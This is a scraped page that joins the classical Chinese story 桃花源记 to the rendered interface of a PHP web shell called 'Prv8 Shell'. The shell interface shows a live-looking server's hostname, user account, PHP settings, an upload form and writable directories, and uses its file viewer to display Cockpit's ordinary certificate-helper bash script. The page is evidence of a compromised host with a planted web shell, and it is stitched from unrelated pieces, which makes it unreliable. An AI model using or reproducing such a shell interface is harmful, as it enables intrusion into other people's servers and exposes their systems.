晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /usr/libexec/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/libexec/cockpit-certificate-helper
#!/bin/bash

set -eu

# prefix= is set because the default /etc contains "${prefix}"
prefix="/usr"
COCKPIT_CONFIG="/etc/cockpit"
COCKPIT_WS_CERTS_D="${COCKPIT_CONFIG}/ws-certs.d"
COCKPIT_RUNTIME_DIR="/run/cockpit"

install_cert() {
    local destination="${COCKPIT_WS_CERTS_D}/$1"
    mv -Z "$1" "${destination}"

    # The certificate should be world-readable
    chmod a+r "${destination}"
}

install_key() {
    local destination="${COCKPIT_WS_CERTS_D}/$1"
    mv -Z "$1" "${destination}"
}

selfsign_sscg() {
    sscg --quiet \
        --lifetime "${DAYS}" \
        --key-strength 2048 \
        --cert-key-file "${KEYFILE}" \
        --cert-file "${CERTFILE}" \
        --ca-file "${CA_FILE}" \
        --hostname "${HOSTNAME}" \
        --organization "${MACHINE_ID:-unspecified}" \
        --subject-alt-name localhost \
        --subject-alt-name IP:127.0.0.1/255.255.255.255
}

selfsign_openssl() {
    openssl req -x509 \
        -days "${DAYS}" \
        -newkey rsa:2048 \
        -keyout "${KEYFILE}" \
        -keyform PEM \
        -nodes \
        -out "${CERTFILE}" \
        -outform PEM \
        -subj "${MACHINE_ID:+/O=${MACHINE_ID}}/CN=${HOSTNAME}" \
        -config - \
        -extensions v3_req << EOF
    [ req ]
    req_extensions = v3_req
    extensions = v3_req
    distinguished_name = req_distinguished_name
    [ req_distinguished_name ]
    [ v3_req ]
    subjectAltName=IP:127.0.0.1,DNS:localhost
    basicConstraints = critical, CA:TRUE
    keyUsage = critical, digitalSignature,cRLSign,keyCertSign,keyEncipherment,keyAgreement
    extendedKeyUsage = serverAuth
EOF
}

cmd_selfsign() {
    # Common variables used by both methods
    local MACHINE_ID
    if [ -e /etc/machine-id ]; then
        MACHINE_ID="$(tr -d -c '[:xdigit:]' < /etc/machine-id)"
    fi
    local HOSTNAME="${HOSTNAME:-$(hostname)}"
    local CERTFILE="0-self-signed.cert"
    local KEYFILE="0-self-signed.key"
    local CA_FILE="0-self-signed-ca.pem"

    # We renew certificates up to 30 days before expiry, so give ourselves a
    # year, plus 30 days.  The maximum is variously mentioned to be 397 or 398.
    local DAYS=395

    # If sscg fails, try openssl
    selfsign_sscg || selfsign_openssl

    # Install the files and set permissions ($CA_FILE is only created by sscg)
    test ! -e "${CA_FILE}" || install_cert "${CA_FILE}"
    install_cert "${CERTFILE}"
    install_key "${KEYFILE}"
}

cmd_ipa_request() {
    local USER="$1"

    # IPA operations require auth; read password from stdin to avoid quoting issues
    # if kinit fails, we can't handle this setup, exit cleanly
    kinit "${USER}@${REALM}" || exit 0

    # ensure this gets run with a non-C locale; ipa fails otherwise
    if [ "$(sh -c 'eval `locale`; echo $LC_CTYPE')" = 'C' ]; then
        export LC_CTYPE=C.UTF-8
    fi

    # create a kerberos Service Principal Name for cockpit-ws, unless already present
    ipa service-show "${SERVICE}" || \
        ipa service-add --ok-as-delegate=true --ok-to-auth-as-delegate=true --force "${SERVICE}"

    # add cockpit-ws key, unless already present
    klist -k "${KEYTAB}" | grep -qF "${SERVICE}" || \
        ipa-getkeytab -p "HTTP/${HOST}" -k "${KEYTAB}"

    # request the certificate and put it into our certificate directory, so that auto-refresh works
    ipa-getcert request -f "${COCKPIT_WS_CERTS_D}/10-ipa.cert" -k "${COCKPIT_WS_CERTS_D}/10-ipa.key" -K "HTTP/${HOST}" -m 640 -o root:root -M 644 -w -v
}

cmd_ipa_cleanup() {
    # clean up keytab
    if [ -e "${KEYTAB}" ]; then
        ipa-rmkeytab -k "${KEYTAB}" -p "${SERVICE}"
    fi

    # clean up certificate; support both "copy" and "direct" modes from cmd_ipa_request()
    if [ -e "${COCKPIT_WS_CERTS_D}/10-ipa.key" ]; then
        rm "${COCKPIT_WS_CERTS_D}/10-ipa.cert" "${COCKPIT_WS_CERTS_D}/10-ipa.key"
        ipa-getcert stop-tracking -f "${COCKPIT_WS_CERTS_D}/10-ipa.cert" -k "${COCKPIT_WS_CERTS_D}/10-ipa.key" || \
            ipa-getcert stop-tracking -f /run/cockpit/certificate-helper/10-ipa.cert -k /run/cockpit/certificate-helper/10-ipa.key
    fi
}

cmd_ipa() {
    local REALM="$2"

    local HOST
    HOST="$(hostname -f)"
    local SERVICE="HTTP/${HOST}@${REALM}"
    local KEYTAB="${COCKPIT_CONFIG}/krb5.keytab"

    # use a temporary keytab to avoid interfering with the system one
    export KRB5CCNAME=/run/cockpit/keytab-setup

    # not an IPA setup? cannot handle this
    if [ -z "$(which ipa)" ]; then
        echo 'ipa must be installed for this command'
        exit 1
    fi

    case "$1" in
        request)
            cmd_ipa_request "$3"
            ;;
        cleanup)
            cmd_ipa_cleanup
            ;;
        *)
            echo 'unknown subcommand'
            exit 1
            ;;
    esac
}

main() {
    # ipa-getkeytab needs root to create the file, same for cert installation
    if [ "$(id -u)" != "0" ]; then
        echo 'must be run as root'
        exit 1
    fi

    # Create a private working directory
    mkdir -p "${COCKPIT_RUNTIME_DIR}"
    WORKDIR="${COCKPIT_RUNTIME_DIR}/certificate-helper"
    mkdir -m 700 "${WORKDIR}" # we expect that not to have existed
    trap 'exit' INT QUIT PIPE TERM
    trap 'rm -rf "${WORKDIR}"' EXIT
    cd "${WORKDIR}"

    # Dispatch subcommand
    case "$1" in
        selfsign)
            cmd_selfsign
            ;;
        ipa)
            shift
            cmd_ipa "$@"
            ;;
        *)
            echo 'unknown subcommand'
            exit 1
            ;;
    esac
}

main "$@"

haha - 2025